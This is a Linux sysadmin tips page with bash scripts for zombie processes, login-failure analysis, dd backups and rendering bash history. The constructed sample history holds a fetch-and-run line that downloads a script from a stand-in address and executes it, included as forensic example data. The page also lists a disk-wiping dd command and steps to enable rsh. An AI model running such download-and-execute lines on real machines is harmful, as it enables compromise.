System Administration Tips
Copying a home directory completely
A user's home directory contains many hidden (dot) files, so there are two ways to copy it completely:
Method 1: copy it as a new directory
cd /home
cp -a user1/ user1_new/
Method 2: copy it into an existing directory
cd /home
cp -a user1/. user1_new/
# "user1/." copies every entry, hidden or not. A glob such as user1/.[^.]* copies only the dot files
# (and skips any name starting with ".."), so the regular files would be missed. cp -a keeps
# ownership, modes, timestamps and symlinks.
Creating a new home directory manually
# -a also copies the hidden files in /etc/skel and keeps their modes
cp -a /etc/skel /home/user1
chown -R user1:group1 /home/user1
chmod 0700 /home/user1
Clearing zombie (defunct) processes
One may deal with zombie processes in any one of the following ways:
- Fix the parent process to make it execute wait(2) on child process exit
- Kill the parent process of the zombie
- Reboot the system
- Ignore it
List zombie processes
ps aux | grep defunct
# The state letter is the STAT column (8th field of "ps aux"); grepping for Z on the whole line
# also hits any command name that contains a Z
ps aux | awk '$8 ~ /^Z/'
# How many zombie processes are running on your server
ps aux | awk '{ print $8 }' | grep -c '^Z'
# List the PID of each zombie together with its parent PID
ps -eo stat,pid,ppid,comm | awk '$1 ~ /^Z/'
Kill a zombie process
# A zombie has already exited and holds no memory, only its process-table entry, so kill cannot
# remove it. The entry disappears when the parent reaps it with wait(2), or when the parent
# exits and PID 1 adopts and reaps the child. Find the parent:
pstree -paul
# Killing the parent is the blunt fix (sending it SIGCHLD first is gentler); make sure the parent
# is something you can afford to lose
kill -9 <PARENT-PID>
RHEL Documents:
- What_is_a_zombie_(defunct)_process.pdf
- How_to_kill_Zombie_Defunct_process.pdf
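The procedure above in script form, as an added example that is not part of the original notes: parse the PID, PPID and STAT columns of ps, list the zombies, and signal each parent. SIGCHLD is sent first, so a parent that merely forgot to wait(2) gets a chance to reap; SIGKILL is used only when FORCE=1. The DRY_RUN and FORCE variables, the function names and the sample ps output are all assumptions of this example; real usage is `ps -eo pid,ppid,stat,comm | reap_zombie_parents` or `./zombies.sh --live`.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): find zombies and their parents from
# "ps -eo pid,ppid,stat,comm" output, then signal the parents. DRY_RUN=1 (default) prints
# the kill commands instead of running them; FORCE=1 switches SIGCHLD to SIGKILL.
DRY_RUN=${DRY_RUN:-1}

# Read ps output on stdin; print "pid ppid comm" for every process whose STAT begins with Z.
list_zombies() {
    awk 'NR > 1 && $3 ~ /^Z/ { print $1, $2, $4 }'
}

# Number of zombies in the ps output on stdin.
count_zombies() {
    list_zombies | wc -l | tr -d ' '
}

# Distinct parent PIDs that own at least one zombie, numerically sorted.
zombie_parents() {
    list_zombies | awk '{ print $2 }' | sort -un
}

# Signal every zombie parent (ps output on stdin). PID 1 reaps orphans on its own, so it is
# skipped: signalling it is pointless and SIGKILL to it is fatal.
reap_zombie_parents() {
    local ppid sig
    for ppid in $(zombie_parents); do
        if [ "$ppid" -le 1 ]; then
            echo "skip parent $ppid"
            continue
        fi
        sig=CHLD
        [ "${FORCE:-0}" = 1 ] && sig=KILL
        if [ "$DRY_RUN" = 1 ]; then
            echo "would run: kill -s $sig $ppid"
        else
            kill -s "$sig" "$ppid" 2>/dev/null || echo "parent $ppid already gone"
        fi
    done
}

# Constructed sample ps output for the offline run below (three zombies, one owned by PID 1).
SAMPLE_PS='  PID  PPID STAT COMMAND
    1     0 Ss   systemd
 4321  1000 Z    worker
 4322  1000 S    worker
 9999  4000 Zs   sleep
 9998     1 Z    orphan'

if [ "${1:-}" = "--live" ]; then
    ps -eo pid,ppid,stat,comm | reap_zombie_parents
else
    printf '%s\n' "$SAMPLE_PS" | reap_zombie_parents
fi
```

On the sample this prints one "would run" line each for parents 1000 and 4000 and skips parent 1; against a live system, export DRY_RUN=0 only after checking with pstree what the parents are.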
Security & auditing
# Parse /var/log/secure: count "authentication failure" records per remote host.
# Pick the rhost= field by name rather than by position ($13), which shifts with the daemon name and PID.
grep "authentication failure" /var/log/secure | grep -o 'rhost=[^ ]*' | cut -d= -f2 | sort | uniq -c | sort -rn
# Failed login attempts (read from /var/log/btmp; -F prints full dates)
lastb -F
lastb -F <username>
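The pam_unix "authentication failure" records above carry their data as named fields (`rhost=`, `user=`), which is what the following added example uses; it is not part of the original notes. It counts failures per source, lists the accounts a source tried, and flags sources above a threshold. The sample log lines, the function names and the threshold default are constructed for this example; real usage is `failed_by_rhost /var/log/secure` and `flag_bruteforce /var/log/secure 5`.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): summarise pam_unix authentication failures
# from /var/log/secure by source host, locating the rhost= and user= fields by name.

# One "rhost user" pair per authentication-failure line in the file given as $1.
# Empty values print as "-": console logins carry an empty rhost=, and a probe that never
# supplied a name carries no user= at all.
pam_failures() {
    grep 'authentication failure' "$1" | awk '{
        r = "-"; u = "-"
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^rhost=./) r = substr($i, 7)
            if ($i ~ /^user=./)  u = substr($i, 6)
        }
        print r, u
    }'
}

# "count rhost" per source, most frequent first.
failed_by_rhost() {
    pam_failures "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Accounts that source $2 tried (useful to tell a password spray from a single-account attack).
users_from_rhost() {
    pam_failures "$1" | awk -v ip="$2" '$1 == ip && $2 != "-" { print $2 }' | sort -u
}

# Print remote sources with at least $2 failures (default 5); exit 0 if any, 1 otherwise.
flag_bruteforce() {
    local threshold=${2:-5}
    failed_by_rhost "$1" | awk -v t="$threshold" \
        '$1 >= t && $2 != "-" { print $2 " (" $1 " failures)"; found = 1 } END { exit !found }'
}

# Constructed sample of /var/log/secure for the offline run (two-space gap before user= is how pam_unix logs it).
SAMPLE_SECURE='Mar  5 10:22:01 host1 sshd[2345]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.0.113.7  user=root
Mar  5 10:22:04 host1 sshd[2345]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar  5 10:22:09 host1 sshd[2349]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.0.113.7  user=root
Mar  5 10:23:15 host1 sshd[2360]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=198.51.100.9
Mar  5 10:24:00 host1 sshd[2370]: Accepted publickey for alang from 192.0.2.10 port 40022 ssh2: RSA SHA256:abc
Mar  5 10:25:42 host1 login: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=tty1 ruser= rhost=  user=alang'
SAMPLE_FILE=$(mktemp)
trap 'rm -f "$SAMPLE_FILE"' EXIT
printf '%s\n' "$SAMPLE_SECURE" > "$SAMPLE_FILE"

failed_by_rhost "$SAMPLE_FILE"
flag_bruteforce "$SAMPLE_FILE" 2
```

Only the pam_unix records are counted; the sshd "Failed password" line for the same attempt is deliberately left out so one attempt is not counted twice. The exit status of flag_bruteforce makes it usable from cron or a monitoring check.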
Check Linux Login History
#!/bin/bash
#Filename: intruder_detect.sh
#Description: Check Linux Login History (one row per user / source IP for failed and successful sshd logins)
AUTHLOG=/var/log/secure
if [[ -n $1 ]]; then
    AUTHLOG=$1
    echo "Using Log file : $AUTHLOG"
fi
# Temporary files; the trap removes them even if the script is interrupted
FAILED_LOG=$(mktemp /tmp/failed.XXXXXX)
SUCCESS_LOG=$(mktemp /tmp/success.XXXXXX)
trap 'rm -f "$FAILED_LOG" "$SUCCESS_LOG"' EXIT
# Collect the failed login attempts
grep "Failed password" "$AUTHLOG" > "$FAILED_LOG"
# Collect the successful login attempts
grep -E "Accepted (password|publickey|keyboard-interactive)" "$AUTHLOG" > "$SUCCESS_LOG"
# The user name is the word right before "from" ("... for [invalid user] USER from IP port N ssh2").
# Counting fields from the end of the line (NF-5) breaks on publickey lines, which append the key type and fingerprint.
extract_users() {
    awk '{ for (i = 2; i <= NF; i++) if ($i == "from") print $(i-1) }' "$1" | sort -u
}
# Source IPv4 addresses seen in the log
extract_ips() {
    grep -oE "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" "$1" | sort -u
}
# Print the heading
printf "%-10s|%-10s|%-10s|%-15s|%-15s|%s\n" "Status" "User" "Attempts" "IP address" "Host" "Time range"
# report STATUS LOGFILE: loop through the IPs and users in LOGFILE and print one row per pair that occurs
report() {
    local status=$1 log=$2 ip user attempts first_time last_time time rhost
    for ip in $(extract_ips "$log"); do
        for user in $(extract_users "$log"); do
            # -F matches the IP literally (a regex "." matches any character) and the surrounding
            # spaces keep 10.0.0.1 from matching 10.0.0.10
            attempts=$(grep -F -- " $ip " "$log" | grep -cF -- " $user from")
            [ "$attempts" -eq 0 ] && continue
            first_time=$(grep -F -- " $ip " "$log" | grep -F -- " $user from" | head -1 | cut -c-16)
            time="$first_time"
            if [ "$attempts" -gt 1 ]; then
                last_time=$(grep -F -- " $ip " "$log" | grep -F -- " $user from" | tail -1 | cut -c-16)
                time="$first_time -> $last_time"
            fi
            # Reverse lookup through the system resolver (the original queried 8.8.8.8 directly).
            # This is slow and tells the resolver every attacker address; drop it if the Host column is not needed.
            rhost=$(host "$ip" 2>/dev/null | tail -1 | awk '{ print $NF }')
            printf "%-10s|%-10s|%-10s|%-15s|%-15s|%-s\n" "$status" "$user" "$attempts" "$ip" "${rhost:-?}" "$time"
        done
    done
}
report Failed "$FAILED_LOG"
report Success "$SUCCESS_LOG"
System audit
# Install auditd and start it; enable it as well so it comes up at boot
yum install audit
systemctl start auditd
systemctl enable auditd
# Authentication report
# All authentication attempts that were made (-i resolves uids and event types to names)
aureport -au -i | more
# Only the successful attempts
aureport -au -i --success | more
# Only the failed attempts
aureport -au -i --failed | more
# Successful logins
aureport -l --success | more
# Failed logins
aureport -l --failed | more
# Summary of successful logins (count per user / host)
aureport -l --success --summary -i | more
Check whether a RHEL system is vulnerable to a specific CVE
# rpm -q --changelog [package-name] | grep [CVE-NUMBER]
rpm -q --changelog openssl | grep CVE-2021-3450
rpm -q --changelog openssl | grep CVE
rpm -q --changelog openssl | grep CVE-2021
# A match means the installed build already carries the fix: Red Hat backports fixes, so the upstream
# version number alone proves nothing. No match means either not fixed yet or not affected, so check the errata:
# Using the yum command (yum-plugin-security is only a separate package on RHEL/CentOS 6; on 7 it is built into yum)
yum install yum-plugin-security
yum update yum
yum updateinfo info --cve CVE-2021-3445
Related tools
- Auditd
- Lynis: auditing tool for UNIX/Linux-like systems
rsh
rsh server
# rsh, rlogin and rexec trust the source address and ~/.rhosts and send everything, passwords
# included, in the clear. Keep them off any network you do not fully control and prefer ssh; if
# legacy equipment needs them, confine them to an isolated segment.
# Install on CentOS 6/7
yum install rsh-server
# Start the service on CentOS 6 (the r-services run under xinetd)
chkconfig rsh on
chkconfig rlogin on
service xinetd reload
# Start the service on CentOS 7 (socket-activated systemd units)
systemctl start rsh.socket
systemctl start rlogin.socket
systemctl start rexec.socket
systemctl enable rsh.socket
systemctl enable rlogin.socket
systemctl enable rexec.socket
Debugging a program with strace
# Trace a command
strace df -h
# Attach to a running process by PID (another user's process needs root, or a relaxed kernel.yama.ptrace_scope)
strace -p 33259
# Summary of the system calls a process makes (count and time per call)
strace -c -p 3569
# Print the instruction pointer at the time of each system call
strace -i df -h
# Show the time of day on each trace output line
strace -t df -h
# Show the time spent in each system call
strace -T df -h
# Trace only specific system calls
strace -e trace=write df -h
strace -p 3569 -e poll
Disabling suspend and hibernation
# Mask the following systemd targets
sudo systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target
# Then reboot the system and log in again
# Verify that the change took effect with
sudo systemctl status sleep.target suspend.target hibernate.target hybrid-sleep.target
# To re-enable suspend and hibernation, run
sudo systemctl unmask sleep.target suspend.target hibernate.target hybrid-sleep.target
To prevent the system from suspending when the lid is closed, edit the /etc/systemd/logind.conf
file (logind only re-reads it after systemd-logind is restarted or the system is rebooted):
[Login]
HandleLidSwitch=ignore
HandleLidSwitchDocked=ignore
Disk information
# Approach #1
lsblk
nvme0n1 259:0 0 465.8G 0 disk
├─nvme0n1p1 259:1 0 512M 0 part /boot/efi
└─nvme0n1p2 259:2 0 465.3G 0 part /
nvme1n1 259:3 0 953.9G 0 disk /media/alang/AlangsData
# Approach #2, must be run as root
sudo lshw -short -class disk,volume
H/W path Device Class Description
====================================================================
/0/100/14/0/3/4/0.0.0 /dev/sda disk Mass-Storage
/0/100/14/0/3/4/0.0.0/0 /dev/sda disk
last
# To check the last ten logins, pipe it into "head"
last | head -n 10
# Use complete usernames and hostnames
last -w
# Show the terminal device of the current session
tty
# To find logins by date
last --since <date>
last --until <date>
last --since -2days
# Find the last bad login attempts
sudo lastb
# On Debian/Ubuntu sshd logs to /var/log/auth.log and the unit is "ssh"; on RHEL/CentOS the
# file is /var/log/secure and the unit is "sshd"
tail -f -n 100 /var/log/auth.log | grep -i failed
# Find the last SSH logins
tail -f -n 100 /var/log/auth.log | grep -i sshd
sudo journalctl -r -u ssh | grep -i failed
# Find the last login time of every user (from /var/log/lastlog)
lastlog
lastlog -u <user>
Detecting the virtualization platform
dmidecode -s system-manufacturer
systemd-detect-virt
virt-what
Hardware information
sudo lshw -short
H/W path Device Class Description
====================================================================
system NUC8i7HVK
/0 bus NUC8i7HVB
/0/0 memory 64KiB BIOS
/0/2f memory 16GiB System Memory
/0/2f/0 memory 8GiB SODIMM DDR4 Synchronous Unbuffered (Unregistered)
/0/2f/1 memory 8GiB SODIMM DDR4 Synchronous Unbuffered (Unregistered)
/0/34 memory 256KiB L1 cache
/0/35 memory 1MiB L2 cache
/0/36 memory 8MiB L3 cache
/0/37 processor Intel(R) Core(TM) i7-8809G CPU @ 3.10GHz
/0/100 bridge Xeon E3-1200 v6/7th Gen Core Processor Host Bridge/DRA
/0/100/1 bridge Xeon E3-1200 v5/E3-1500 v5/6th Gen Core Processor PCIe
/0/100/1/0 /dev/fb0 display Polaris 22 [Radeon RX Vega M GH]
/0/100/1/0.1 multimedia Advanced Micro Devices, Inc. [AMD/ATI]
/0/100/1.1 bridge Xeon E3-1200 v5/E3-1500 v5/6th Gen Core Processor PCIe
/0/100/1.1/0 bus ASMedia Technology Inc.
/0/100/1.1/0/0 usb3 bus xHCI Host Controller
/0/100/1.1/0/1 usb4 bus xHCI Host Controller
...
# Full report as an HTML file
sudo lshw -html > HardwareSummary.html
Build and development tools
Install
# RedHat/CentOS 6
yum install make libtool autoconf subversion git cvs wget libogg-devel gcc gcc-c++ pkgconfig
# RedHat/CentOS 7
yum group install "Development Tools"
dd
# Back up the MBR (446 bytes of boot code + 64-byte partition table + 2-byte signature;
# bs=446 would save only the boot code, so a restore leaves the partition table alone)
dd if=/dev/sdX of=/path/to/mbr.img count=1 bs=512
# Turn a CD into an iso file
dd if=/dev/cdrom of=/root/cd.iso
# Destroy the data on a partition (urandom is slow on large disks, and on an SSD wear
# levelling can leave old blocks untouched, so a firmware secure erase is the reliable option)
dd if=/dev/urandom of=/dev/sdX1
# Back up an entire USB flash drive
dd if=/dev/sdb | gzip > ./my-usb_flash.img.gz
# Restore the USB flash drive
gzip -dc ./my-usb_flash.img.gz | dd of=/dev/sdb
# Create a 10 GB test file
dd if=/dev/zero of=/path/to/image bs=1G count=10
# NOTE: on newer Linux the file can be allocated instantly instead, e.g.
fallocate -l 1G test.img
# Test the network bandwidth between two Linux servers through an NFS/CIFS mount
# (iflag/oflag=direct bypasses the page cache, so the client's RAM cannot serve the read)
dd if=/nas-mount-point/samplefile of=/dev/null bs=1M count=1024 iflag=direct
dd if=/dev/zero of=/nas-mount-point/samplefile bs=1M count=1024 oflag=direct
# NOTE: samplefile must be larger than 1 GB, and the machine should have more than 2 GB of RAM.
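The USB-flash backup and restore above trusts the archive blindly. The added example below (not part of the original notes) wraps the same dd | gzip pipeline in functions that record a SHA-256 and byte count of the raw image, refuse to restore an archive that no longer matches, and re-read the written bytes from the target to prove the restore. It runs against a constructed 3 MiB file standing in for the stick; the function names, the `.sha256` sidecar format and the demo are assumptions of this example, and for a real device you would call `backup_device /dev/sdb stick.img.gz` as root.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): dd image backup/restore with verification.
# pipefail so a failing dd is not hidden behind a successful gzip.
set -o pipefail

# backup_device DEVICE IMAGE.gz : writes the compressed image plus IMAGE.gz.sha256 holding
# "<sha256> <byte count>" of the raw data.
backup_device() {
    local dev=$1 img=$2 sum size
    dd if="$dev" bs=4M status=none | gzip -1 > "$img" || return 1
    # Hash the decompressed archive rather than the device again: this also proves the archive is readable.
    sum=$(gzip -dc "$img" | sha256sum | cut -d' ' -f1)
    size=$(gzip -dc "$img" | wc -c | tr -d ' ')
    printf '%s %s\n' "$sum" "$size" > "$img.sha256"
}

# verify_image IMAGE.gz : 0 if the archive still decompresses to the recorded hash.
verify_image() {
    local img=$1 want
    read -r want _ < "$img.sha256"
    [ "$(gzip -dc "$img" | sha256sum | cut -d' ' -f1)" = "$want" ]
}

# restore_device IMAGE.gz DEVICE : verify first, write back, then re-read exactly the bytes written
# (so a target larger than the image still verifies) and compare them to the recorded hash.
restore_device() {
    local img=$1 dev=$2 want size
    verify_image "$img" || { echo "refusing to restore: $img does not match its checksum" >&2; return 1; }
    read -r want size < "$img.sha256"
    gzip -dc "$img" | dd of="$dev" bs=4M status=none conv=fsync || return 1
    [ "$(head -c "$size" "$dev" | sha256sum | cut -d' ' -f1)" = "$want" ]
}

# Offline demonstration on a constructed 3 MiB file standing in for a USB stick.
demo_roundtrip() {
    local work
    work=$(mktemp -d) || return 1
    dd if=/dev/urandom of="$work/stick" bs=1M count=3 status=none
    backup_device "$work/stick" "$work/stick.img.gz" || return 1
    verify_image "$work/stick.img.gz" || return 1
    restore_device "$work/stick.img.gz" "$work/restored" || return 1
    cmp -s "$work/stick" "$work/restored" || return 1
    # A damaged archive (last 16 bytes cut off) must be rejected before anything is written back.
    truncate -s -16 "$work/stick.img.gz"
    if verify_image "$work/stick.img.gz"; then rm -rf "$work"; return 1; fi
    if restore_device "$work/stick.img.gz" "$work/restored2" 2>/dev/null; then rm -rf "$work"; return 1; fi
    rm -rf "$work"
}

demo_roundtrip && echo "dd round trip verified, damaged archive rejected"
```

Keep the `.sha256` sidecar with the image; without it a silently corrupted archive is only discovered when the restored system fails to boot.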
history
- Bash History Display Date And Time For Each Command
- How to disable bash shell history in Linux
- Parsing Bash history in Linux
See time stamps in bash history
echo 'export HISTTIMEFORMAT="%F %T "' >> ~/.bash_profile
# Only commands recorded after the setting is in effect get a time stamp; bash saves it as a
# "#<epoch seconds>" line right before the command in ~/.bash_history, and older entries have none.
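A history file copied off a machine for review is easier to read when those `#<epoch>` lines are turned back into dates. The added example below (not part of the original notes) does that in awk alone, converting to UTC without GNU date or gawk's strftime, so the output is identical wherever the file is examined; entries that predate HISTTIMEFORMAT are shown as "unknown". The sample history, the function names and the civil-date routine are assumptions of this example; real usage is `render_history ~/.bash_history`.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): render a .bash_history written while
# HISTTIMEFORMAT was set. A "#<digits>" line is treated as the time stamp of the command that
# follows it, which is also how bash itself reads the file.

# render_history [FILE] : "YYYY-MM-DD HH:MM:SS  command" per entry, in UTC (stdin if no file given)
render_history() {
    awk '
        # days since 1970-01-01 -> YYYY-MM-DD (proleptic Gregorian; valid for non-negative day counts)
        function civil(z,    era, doe, yoe, y, doy, mp, d, m) {
            z += 719468
            era = int(z / 146097)
            doe = z - era * 146097
            yoe = int((doe - int(doe / 1460) + int(doe / 36524) - int(doe / 146096)) / 365)
            y = yoe + era * 400
            doy = doe - (365 * yoe + int(yoe / 4) - int(yoe / 100))
            mp = int((5 * doy + 2) / 153)
            d = doy - int((153 * mp + 2) / 5) + 1
            m = mp < 10 ? mp + 3 : mp - 9
            if (m <= 2) y++
            return sprintf("%04d-%02d-%02d", y, m, d)
        }
        # epoch seconds -> "YYYY-MM-DD HH:MM:SS" in UTC
        function utc(ts,    days, secs) {
            days = int(ts / 86400)
            secs = ts - days * 86400
            return civil(days) " " sprintf("%02d:%02d:%02d", int(secs / 3600), int(secs % 3600 / 60), secs % 60)
        }
        /^#[0-9]+$/ { ts = substr($0, 2); next }           # time-stamp line: remember it, print nothing
        { printf "%-19s  %s\n", (ts == "" ? "unknown" : utc(ts)), $0; ts = "" }
    ' "$@"
}

# epoch_to_utc SECONDS : the same conversion for a single value
epoch_to_utc() {
    printf '#%s\nx\n' "$1" | render_history | cut -c1-19
}

# Constructed sample history: the first entry predates HISTTIMEFORMAT, the other two carry stamps.
SAMPLE_HISTORY=$(mktemp)
trap 'rm -f "$SAMPLE_HISTORY"' EXIT
cat > "$SAMPLE_HISTORY" <<'EOF'
ls -la /root
#1700000000
curl -s http://203.0.113.7/x.sh -o /tmp/x.sh
#1700000042
bash /tmp/x.sh
EOF

render_history "$SAMPLE_HISTORY"
```

The sample renders as "unknown" for the first command and "2023-11-14 22:13:20" / "2023-11-14 22:14:02" for the two stamped ones. Bear in mind that the stamps are whatever the clock said on the machine that wrote the file, and that a user can edit or truncate ~/.bash_history at will, so treat it as a lead rather than evidence on its own.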
System performance management
Processes using swap
# Prints "name swap kB" per process, largest first (needs a kernel that reports VmSwap in /proc/PID/status)
for file in /proc/*/status ; do awk '/VmSwap|Name/{printf $2 " " $3}END{ print ""}' $file; done | sort -k 2 -n -r | less
Swap management
# Check the current swap configuration
free
swapon -s
# Enable/disable swap
swapon /dev/sda3
swapoff /dev/sda3
# Make a swap area
mkswap /dev/sda3
make-swapfile-DO.sh (1 GB)
#!/bin/bash
# 1 GiB swap file written with dd rather than fallocate: swapon refuses files with holes, and
# fallocate-created files are not accepted on every filesystem. The file must be on a local filesystem.
dd if=/dev/zero of=/swapfile bs=1M count=1024
chown root:root /swapfile
# 0600: a readable swap file exposes the memory of every process that was swapped out
chmod 0600 /swapfile
mkswap /swapfile
swapon /swapfile
echo "/swapfile swap swap defaults 0 0" >> /etc/fstab
# Prefer dropping page cache over swapping processes out
sysctl vm.swappiness=10
echo vm.swappiness=10 >> /etc/sysctl.conf
free -h
cat /proc/sys/vm/swappiness
Repairing an XFS filesystem
sudo mount -a
mount: /data: mount(2) system call failed: Structure needs cleaning.
# The filesystem must be unmounted before xfs_repair touches it
sudo umount /data
# '-n' performs a dry run: report the problems without modifying anything
sudo xfs_repair -n /dev/sdb1
# Repair the filesystem. If it refuses because the log is dirty, mount the filesystem once so the log
# replays and try again; zeroing the log with -L discards the pending journal and is a last resort.
sudo xfs_repair /dev/sdb1
Linux modules
Monitoring file and directory changes
- Watchman: a file and directory watching tool for changes
- inotify-tools: monitors file changes under a given directory (supported on Linux 2.6.13 and later); the linked example watches a directory and calls an rsync backup script as soon as a file or directory changes.
- fswatch: monitors files and directory changes or modifications in Linux
- AIDE: how to check the integrity of files and directories using "AIDE" in Linux
- Pyinotify
The inotify-based tools react in real time but only while they are running; AIDE compares the filesystem with a baseline database and also catches changes made while nothing was watching, provided the database is kept where an intruder on the host cannot rewrite it.